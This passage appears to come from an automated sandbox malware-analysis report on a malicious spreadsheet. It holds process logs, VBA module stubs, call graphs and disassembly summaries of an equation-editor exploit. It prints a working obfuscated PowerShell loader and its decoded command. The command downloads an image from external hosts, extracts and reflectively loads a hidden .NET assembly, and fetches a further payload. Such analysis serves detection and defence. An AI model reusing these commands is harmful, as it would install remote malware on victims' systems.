PQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreGUDgTreIDgTreDgTrewDgTreCDgTreDgTreLQBhDgTreG4DgTreZDgTreDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreHQDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreC4DgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreOwDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreDsDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreFMDgTredQBiDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCwDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCkDgTreOwDgTregDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreEMDgTrebwBuDgTreHYDgTreZQByDgTreHQDgTreXQDgTre6DgTreDoDgTreRgByDgTreG8DgTrebQBCDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreQwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreUgBlDgTreGYDgTrebDgTreBlDgTreGMDgTredDgTreBpDgTreG8DgTrebgDgTreuDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQBdDgTreDoDgTreOgBMDgTreG8DgTreYQBkDgTreCgDgTreJDgTreBjDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreLgBHDgTreGUDgTredDgTreBUDgTreHkDgTrecDgTreBlDgTreCgDgTreJwBQDgTreFIDgTreTwBKDgTreEUDgTreVDgTreBPDgTreEEDgTreVQBUDgTreE8DgTreTQBBDgTreEMDgTreQQBPDgTreC4DgTreVgBCDgTreC4DgTreSDgTreBvDgTreG0DgTreZQDgTrenDgTreCkDgTreOwDgTregDgTreCQDgTrebQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreC4DgTreRwBlDgTreHQDgTreTQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreKDgTreDgTrenDgTreFYDgTreQQBJDgTreCcDgTreKQDgTreuDgTreEkDgTrebgB2DgTreG8DgTreawBlDgTreCgDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCwDgTreIDgTreBbDgTreG8DgTreYgBqDgTreGUDgTreYwB0DgTreFsDgTreXQBdDgTreCDgTreDgTreKDgTreDgTrenDgTreHQDgTreeDgTreB0DgTreC4DgTreSDgTreBHDgTreFUDgTreUwDgTrevDgTreDYDgTreNgDgTre1DgTreDMDgTreLwDgTre2DgTreDkDgTreLgDgTre0DgTreDQDgTreMgDgTreuDgTreDIDgTreOQDgTreuDgTreDEDgTreOQDgTrevDgTreC8DgTreOgBwDgTreHQDgTredDgTreBoDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwDgTrexDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwBDDgTreDoDgTreXDgTreBQDgTreHIDgTrebwBnDgTreHIDgTreYQBtDgTreEQDgTreYQB0DgTreGEDgTreXDgTreDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreUwBVDgTreFUDgTreJwDgTresDgTreCcDgTreUgBlDgTreGcDgTreQQBzDgTreG0DgTreJwDgTresDgTreCcDgTreJwDgTrepDgTreCkDgTrefQDgTregDgTreH0DgTre';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD
                                                  Imagebase:0x1100000
                                                  File size:427'008 bytes
                                                  MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:moderate
                                                  Has exited:true

                                                  General

                                                  Target ID:15
                                                  Start time:08:29:55
                                                  Start date:14/02/2024
                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://uploaddeimagens.com.br/images/004/738/994/original/new_image_vbs_updated.jpg?1707769907', 'http://45.74.19.84/xampp/bkp/vbs_novo_new_image.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.HGUS/6653/69.442.29.19//:ptth' , '1' , 'C:\ProgramData\' , 'SUU','RegAsm',''))} }
                                                  Imagebase:0x1100000
                                                  File size:427'008 bytes
                                                  MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:moderate
                                                  Has exited:true

                                                  General

                                                  Target ID:16
                                                  Start time:08:29:59
                                                  Start date:14/02/2024
                                                  Path:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" -Embedding
                                                  Imagebase:0x12d0000
                                                  File size:2'525'680 bytes
                                                  MD5 hash:2F8D93826B8CBF9290BC57535C7A6817
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:17
                                                  Start time:08:30:17
                                                  Start date:14/02/2024
                                                  Path:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
                                                  Imagebase:0x11a0000
                                                  File size:9'805'808 bytes
                                                  MD5 hash:326A645391A97C760B60C558A35BB068
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Disassembly

                                                  Code Analysis

                                                  Call Graph

                                                  • Entrypoint
                                                  • Decryption Function
                                                  • Executed
                                                  • Not Executed
                                                  • Show Help
                                                  callgraph 1 Error: Graph is empty

                                                  Module: Sheet1

                                                  Declaration
                                                  LineContent
                                                  1

                                                  Attribute VB_Name = "Sheet1"

                                                  2

                                                  Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                  3

                                                  Attribute VB_GlobalNameSpace = False

                                                  4

                                                  Attribute VB_Creatable = False

                                                  5

                                                  Attribute VB_PredeclaredId = True

                                                  6

                                                  Attribute VB_Exposed = True

                                                  7

                                                  Attribute VB_TemplateDerived = False

                                                  8

                                                  Attribute VB_Customizable = True

                                                  Module: Sheet2

                                                  Declaration
                                                  LineContent
                                                  1

                                                  Attribute VB_Name = "Sheet2"

                                                  2

                                                  Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                  3

                                                  Attribute VB_GlobalNameSpace = False

                                                  4

                                                  Attribute VB_Creatable = False

                                                  5

                                                  Attribute VB_PredeclaredId = True

                                                  6

                                                  Attribute VB_Exposed = True

                                                  7

                                                  Attribute VB_TemplateDerived = False

                                                  8

                                                  Attribute VB_Customizable = True

                                                  Module: Sheet3

                                                  Declaration
                                                  LineContent
                                                  1

                                                  Attribute VB_Name = "Sheet3"

                                                  2

                                                  Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                  3

                                                  Attribute VB_GlobalNameSpace = False

                                                  4

                                                  Attribute VB_Creatable = False

                                                  5

                                                  Attribute VB_PredeclaredId = True

                                                  6

                                                  Attribute VB_Exposed = True

                                                  7

                                                  Attribute VB_TemplateDerived = False

                                                  8

                                                  Attribute VB_Customizable = True

                                                  Module: ThisWorkbook

                                                  Declaration
                                                  LineContent
                                                  1

                                                  Attribute VB_Name = "ThisWorkbook"

                                                  2

                                                  Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"

                                                  3

                                                  Attribute VB_GlobalNameSpace = False

                                                  4

                                                  Attribute VB_Creatable = False

                                                  5

                                                  Attribute VB_PredeclaredId = True

                                                  6

                                                  Attribute VB_Exposed = True

                                                  7

                                                  Attribute VB_TemplateDerived = False

                                                  8

                                                  Attribute VB_Customizable = True

                                                  Reset < >

                                                    Execution Graph

                                                    Execution Coverage:17.5%
                                                    Dynamic/Decrypted Code Coverage:0%
                                                    Signature Coverage:65%
                                                    Total number of Nodes:100
                                                    Total number of Limit Nodes:6
                                                    execution_graph 363 36b056b GetPEB 364 36b0579 363->364 365 36b0481 366 36b0483 365->366 369 36b0496 LoadLibraryW 366->369 383 36b04b0 369->383 371 36b049d 372 36b0512 371->372 373 36b04a4 371->373 374 36b0531 372->374 375 36b053f ShellExecuteW ExitProcess ExitProcess 372->375 376 36b04c1 373->376 377 36b0511 8 API calls 373->377 378 36b0539 ShellExecuteW 374->378 380 36b0488 374->380 375->374 377->376 379 36b0564 ExitProcess 378->379 381 36b0558 379->381 381->380 382 36b0567 ExitProcess 381->382 384 36b04b3 383->384 387 36b0511 URLDownloadToFileW 384->387 397 36b052a 387->397 390 36b0531 392 36b0539 ShellExecuteW 390->392 395 36b04c1 390->395 406 36b0564 392->406 394 36b0558 394->395 396 36b0567 ExitProcess 394->396 398 36b052c 397->398 399 36b053f 3 API calls 398->399 400 36b0531 399->400 401 36b0539 ShellExecuteW 400->401 403 36b051a 400->403 402 36b0564 ExitProcess 401->402 404 36b0558 402->404 403->390 408 36b053f 403->408 404->403 405 36b0567 ExitProcess 404->405 407 36b0567 ExitProcess 406->407 409 36b0542 ShellExecuteW 408->409 410 36b0558 409->410 411 36b0564 ExitProcess 409->411 412 36b0567 ExitProcess 410->412 413 36b059f 410->413 411->410 413->390 414 36b03e1 ExitProcess 440 36b03fa 414->440 419 36b044f 441 36b0400 440->441 442 36b0407 441->442 443 36b0416 14 API calls 441->443 444 36b043d 11 API calls 442->444 461 36b044f 442->461 443->442 445 36b0423 444->445 446 36b0496 LoadLibraryW 445->446 447 36b042d 445->447 448 36b04b0 8 API calls 446->448 449 36b042f 447->449 450 36b049d 447->450 448->450 452 36b04a4 449->452 453 36b0437 449->453 449->461 451 36b0512 450->451 450->452 454 36b0531 451->454 455 36b053f 3 API calls 451->455 456 36b04c1 452->456 457 36b0511 8 API calls 452->457 493 36b0481 453->493 458 36b0539 ShellExecuteW 454->458 462 36b03ed 454->462 455->454 457->456 460 36b0564 ExitProcess 458->460 463 36b0558 460->463 465 36b0416 462->465 463->462 464 36b0567 ExitProcess 463->464 466 36b041c 465->466 467 36b0423 466->467 468 36b043d 11 API calls 466->468 469 36b0496 LoadLibraryW 467->469 470 36b042d 467->470 468->467 471 36b04b0 8 API calls 469->471 472 36b049d 470->472 474 36b042f 470->474 471->472 475 36b04a4 472->475 476 36b0512 472->476 473 36b0488 474->473 474->475 477 36b0437 474->477 480 36b04c1 475->480 481 36b0511 8 API calls 475->481 478 36b0531 476->478 479 36b053f 3 API calls 476->479 483 36b0481 11 API calls 477->483 482 36b0539 ShellExecuteW 478->482 485 36b0407 478->485 479->478 481->480 484 36b0564 ExitProcess 482->484 486 36b044f 483->486 487 36b0558 484->487 485->419 489 36b043d 485->489 487->485 488 36b0567 ExitProcess 487->488 490 36b0440 489->490 491 36b0481 11 API calls 490->491 492 36b044f 491->492 494 36b0483 493->494 495 36b0496 11 API calls 494->495 496 36b0488 495->496

                                                    Callgraph

                                                    • Executed
                                                    • Not Executed
                                                    • Opacity -> Relevance
                                                    • Disassembly available
                                                    callgraph 0 Function_036B056B 18 Function_036B0593 0->18 1 Function_036B052A 9 Function_036B0564 1->9 12 Function_036B053F 1->12 2 Function_036B01EA 3 Function_036B034A 4 Function_036B02AF 5 Function_036B03E1 6 Function_036B0481 5->6 5->9 11 Function_036B03FA 5->11 5->12 14 Function_036B043D 5->14 19 Function_036B0511 5->19 20 Function_036B04B0 5->20 22 Function_036B0416 5->22 21 Function_036B0496 6->21 7 Function_036B0080 8 Function_036B0000 10 Function_036B05E4 11->6 11->9 11->10 11->12 11->14 11->19 11->20 11->22 12->9 13 Function_036B00BD 14->6 15 Function_036B013C 16 Function_036B023C 17 Function_036B03B3 19->1 19->9 19->12 20->19 21->9 21->12 21->19 21->20 22->6 22->9 22->10 22->12 22->14 22->19 22->20 23 Function_036B00D4

                                                    Executed Functions

                                                    Function 036B0496 Relevance: 4.6, APIs: 3, Instructions: 88libraryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 0 36b0496-36b04a2 LoadLibraryW call 36b04b0 4 36b0512-36b052b 0->4 5 36b04a4-36b04bb 0->5 8 36b0531-36b0537 4->8 9 36b052c call 36b053f 4->9 10 36b04c1-36b050f 5->10 11 36b04bc call 36b0511 5->11 12 36b0539-36b055b ShellExecuteW call 36b0564 8->12 13 36b059e-36b05aa 8->13 9->8 11->10 15 36b05ad 12->15 28 36b055d 12->28 13->15 18 36b05af-36b05b3 15->18 19 36b05b5-36b05b9 15->19 18->19 21 36b05c1-36b05c8 18->21 22 36b05bb-36b05bf 19->22 23 36b05ce-36b05d0 19->23 25 36b05ca 21->25 26 36b05cc 21->26 22->21 22->23 27 36b05e0-36b05e1 23->27 25->23 26->23 29 36b05d2-36b05db 26->29 28->23 30 36b055f-36b0569 ExitProcess 28->30 29->27 31 36b059f-36b05a2 29->31 33 36b05dd 31->33 34 36b05a4-36b05a7 31->34 33->27 34->29 35 36b05a9 34->35 35->15
                                                    APIs
                                                    • LoadLibraryW.KERNEL32(036B0488), ref: 036B0496
                                                    • ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 036B0551
                                                    • ExitProcess.KERNEL32(00000000), ref: 036B0569
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.409074474.00000000036B0000.00000004.00000020.00020000.00000000.sdmp, Offset: 036B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_36b0000_EQNEDT32.jbxd
                                                    Similarity
                                                    • API ID: ExecuteExitLibraryLoadProcessShell
                                                    • String ID:
                                                    • API String ID: 2383344257-0
                                                    • Opcode ID: 45010463c9ad8f10567df802581fdd790cd3a108376e23318acedc5d3c321f1d
                                                    • Instruction ID: c9cf882862d23c2119946672c2f5c7e342e4d613d520babfdee4599cf79d0a2e
                                                    • Opcode Fuzzy Hash: 45010463c9ad8f10567df802581fdd790cd3a108376e23318acedc5d3c321f1d
                                                    • Instruction Fuzzy Hash: 352139E290D3C56FD71397300D6ABA6BF746F23204F5945CEE0C2098E3E6985585CB66
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 036B0511 Relevance: 4.5, APIs: 3, Instructions: 37filenetworkCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 37 36b0511-36b052b URLDownloadToFileW call 36b052a 41 36b0531-36b0537 37->41 42 36b052c call 36b053f 37->42 43 36b0539-36b055b ShellExecuteW call 36b0564 41->43 44 36b059e-36b05aa 41->44 42->41 45 36b05ad 43->45 57 36b055d 43->57 44->45 47 36b05af-36b05b3 45->47 48 36b05b5-36b05b9 45->48 47->48 50 36b05c1-36b05c8 47->50 51 36b05bb-36b05bf 48->51 52 36b05ce-36b05d0 48->52 54 36b05ca 50->54 55 36b05cc 50->55 51->50 51->52 56 36b05e0-36b05e1 52->56 54->52 55->52 58 36b05d2-36b05db 55->58 57->52 59 36b055f-36b0569 ExitProcess 57->59 58->56 60 36b059f-36b05a2 58->60 62 36b05dd 60->62 63 36b05a4-36b05a7 60->63 62->56 63->58 64 36b05a9 63->64 64->45
                                                    APIs
                                                    • URLDownloadToFileW.URLMON(00000000,036B04C1,?,00000000,00000000), ref: 036B0513
                                                      • Part of subcall function 036B052A: ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 036B0551
                                                      • Part of subcall function 036B052A: ExitProcess.KERNEL32(00000000), ref: 036B0569
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.409074474.00000000036B0000.00000004.00000020.00020000.00000000.sdmp, Offset: 036B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_36b0000_EQNEDT32.jbxd
                                                    Similarity
                                                    • API ID: DownloadExecuteExitFileProcessShell
                                                    • String ID:
                                                    • API String ID: 3584569557-0
                                                    • Opcode ID: 2ac2e785a5df96b5b1d2b6d05b07d367621e1ab0833f3c674eb7a3d1e14328db
                                                    • Instruction ID: d12014b004e8e31bf169af7f66e5742436f3cebc286d2dbc66b246aa3319de96
                                                    • Opcode Fuzzy Hash: 2ac2e785a5df96b5b1d2b6d05b07d367621e1ab0833f3c674eb7a3d1e14328db
                                                    • Instruction Fuzzy Hash: 1FF0E2D354D3402AE621E7740E4AFEB7E349F81B00F540889F1424D8D3D79094C0CF29
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 036B053F Relevance: 3.0, APIs: 2, Instructions: 50COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 66 36b053f-36b0551 ShellExecuteW 68 36b0558-36b055b 66->68 69 36b0553 call 36b0564 66->69 71 36b05ad 68->71 72 36b055d 68->72 69->68 73 36b05af-36b05b3 71->73 74 36b05b5-36b05b9 71->74 75 36b055f-36b0569 ExitProcess 72->75 76 36b05ce-36b05d0 72->76 73->74 77 36b05c1-36b05c8 73->77 74->76 78 36b05bb-36b05bf 74->78 79 36b05e0-36b05e1 76->79 81 36b05ca 77->81 82 36b05cc 77->82 78->76 78->77 81->76 82->76 84 36b05d2-36b05db 82->84 84->79 85 36b059f-36b05a2 84->85 86 36b05dd 85->86 87 36b05a4-36b05a7 85->87 86->79 87->84 88 36b05a9 87->88 88->71
                                                    APIs
                                                    • ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 036B0551
                                                      • Part of subcall function 036B0564: ExitProcess.KERNEL32(00000000), ref: 036B0569
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.409074474.00000000036B0000.00000004.00000020.00020000.00000000.sdmp, Offset: 036B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_36b0000_EQNEDT32.jbxd
                                                    Similarity
                                                    • API ID: ExecuteExitProcessShell
                                                    • String ID:
                                                    • API String ID: 1124553745-0
                                                    • Opcode ID: 9bb4a9efaea7c07eca078e7354966bed14a700fa2dbfda34c55d40211f488600
                                                    • Instruction ID: 613a42b9cc408053305d923913bc8882de2826f75678bd6deec51583f2d196b6
                                                    • Opcode Fuzzy Hash: 9bb4a9efaea7c07eca078e7354966bed14a700fa2dbfda34c55d40211f488600
                                                    • Instruction Fuzzy Hash: 7501D1DBA5534222DB30E6684B46BEBAF71AB51700FCC8847F98208DC5D794A1C38F29
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 036B052A Relevance: 3.0, APIs: 2, Instructions: 47COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 89 36b052a-36b0537 call 36b053f 93 36b0539-36b055b ShellExecuteW call 36b0564 89->93 94 36b059e-36b05aa 89->94 95 36b05ad 93->95 107 36b055d 93->107 94->95 97 36b05af-36b05b3 95->97 98 36b05b5-36b05b9 95->98 97->98 100 36b05c1-36b05c8 97->100 101 36b05bb-36b05bf 98->101 102 36b05ce-36b05d0 98->102 104 36b05ca 100->104 105 36b05cc 100->105 101->100 101->102 106 36b05e0-36b05e1 102->106 104->102 105->102 108 36b05d2-36b05db 105->108 107->102 109 36b055f-36b0569 ExitProcess 107->109 108->106 110 36b059f-36b05a2 108->110 112 36b05dd 110->112 113 36b05a4-36b05a7 110->113 112->106 113->108 114 36b05a9 113->114 114->95
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.409074474.00000000036B0000.00000004.00000020.00020000.00000000.sdmp, Offset: 036B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_36b0000_EQNEDT32.jbxd
                                                    Similarity
                                                    • API ID: ExecuteExitProcessShell
                                                    • String ID:
                                                    • API String ID: 1124553745-0
                                                    • Opcode ID: 86e204669779fcf6b1d289fc5e1d83ca539377395524096db536a032bfc48ab3
                                                    • Instruction ID: f0b2835526e37728886be14a212bb1b17b47945956b64631d15ba96235cd01e4
                                                    • Opcode Fuzzy Hash: 86e204669779fcf6b1d289fc5e1d83ca539377395524096db536a032bfc48ab3
                                                    • Instruction Fuzzy Hash: 5E0149E355930122E330E6240F85BEBBDB09B81704FA8845AF19208CD1C39495C3CF2D
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 036B0416 Relevance: 1.6, APIs: 1, Instructions: 97libraryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 116 36b0416 117 36b041c 116->117 118 36b0417 call 36b05e4 116->118 119 36b0423-36b0424 117->119 120 36b041e call 36b043d 117->120 118->117 121 36b0496-36b049d LoadLibraryW call 36b04b0 119->121 122 36b0426-36b042b 119->122 120->119 126 36b049e-36b04a2 121->126 122->121 123 36b042d 122->123 125 36b042f-36b0433 123->125 123->126 130 36b0488-36b0494 125->130 131 36b0435 125->131 128 36b0512-36b052b 126->128 129 36b04a4-36b04a7 126->129 135 36b0531-36b0537 128->135 136 36b052c call 36b053f 128->136 132 36b04a9-36b04bb 129->132 131->132 134 36b0437-36b047f call 36b0481 131->134 137 36b04c1-36b050f 132->137 138 36b04bc call 36b0511 132->138 140 36b0539-36b055b ShellExecuteW call 36b0564 135->140 141 36b059e-36b05aa 135->141 136->135 138->137 144 36b05ad 140->144 160 36b055d 140->160 141->144 148 36b05af-36b05b3 144->148 149 36b05b5-36b05b9 144->149 148->149 152 36b05c1-36b05c8 148->152 153 36b05bb-36b05bf 149->153 154 36b05ce-36b05d0 149->154 157 36b05ca 152->157 158 36b05cc 152->158 153->152 153->154 159 36b05e0-36b05e1 154->159 157->154 158->154 162 36b05d2-36b05db 158->162 160->154 163 36b055f-36b0569 ExitProcess 160->163 162->159 165 36b059f-36b05a2 162->165 167 36b05dd 165->167 168 36b05a4-36b05a7 165->168 167->159 168->162 169 36b05a9 168->169 169->144
                                                    APIs
                                                    • LoadLibraryW.KERNEL32(036B0488), ref: 036B0496
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.409074474.00000000036B0000.00000004.00000020.00020000.00000000.sdmp, Offset: 036B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_36b0000_EQNEDT32.jbxd
                                                    Similarity
                                                    • API ID: LibraryLoad
                                                    • String ID:
                                                    • API String ID: 1029625771-0
                                                    • Opcode ID: f53403379a31c48b7994f71acbb44e5265b56f2d49ee18e9e919679dd4adce46
                                                    • Instruction ID: cfb9fc44095512484e68890ef9009506cd22093747922401a4acdaccb82bf7f2
                                                    • Opcode Fuzzy Hash: f53403379a31c48b7994f71acbb44e5265b56f2d49ee18e9e919679dd4adce46
                                                    • Instruction Fuzzy Hash: D1317AE680C7C19FD713D7305E6A6A6BF642E2300470D8ACEC4C6095A3E794A181CBA7
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 036B0564 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 171 36b0564-36b0569 ExitProcess
                                                    APIs
                                                    • ExitProcess.KERNEL32(00000000), ref: 036B0569
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.409074474.00000000036B0000.00000004.00000020.00020000.00000000.sdmp, Offset: 036B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_36b0000_EQNEDT32.jbxd
                                                    Similarity
                                                    • API ID: ExitProcess
                                                    • String ID:
                                                    • API String ID: 621844428-0
                                                    • Opcode ID: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
                                                    • Instruction ID: f49c04242a7a61e974833cf8218924656bc711991e28e6f13ed51e74029fe7d2
                                                    • Opcode Fuzzy Hash: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
                                                    • Instruction Fuzzy Hash:
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 036B056B Relevance: .0, Instructions: 14COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 173 36b056b-36b0576 GetPEB 174 36b0579-36b058a call 36b0593 173->174 177 36b058c-36b0590 174->177
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.409074474.00000000036B0000.00000004.00000020.00020000.00000000.sdmp, Offset: 036B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_36b0000_EQNEDT32.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
                                                    • Instruction ID: 128ed3d5a7f8b6c2b4039027fecb20251d12f40efdfb22d6b14eca58e29e5b92
                                                    • Opcode Fuzzy Hash: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
                                                    • Instruction Fuzzy Hash: 4AD017B2201502CFC304DB04CA40A53F37AFBC8210B18C268E0004BA19C730E8D1CB94
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Non-executed Functions

                                                    Function 036B03E1 Relevance: 1.6, APIs: 1, Instructions: 59COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
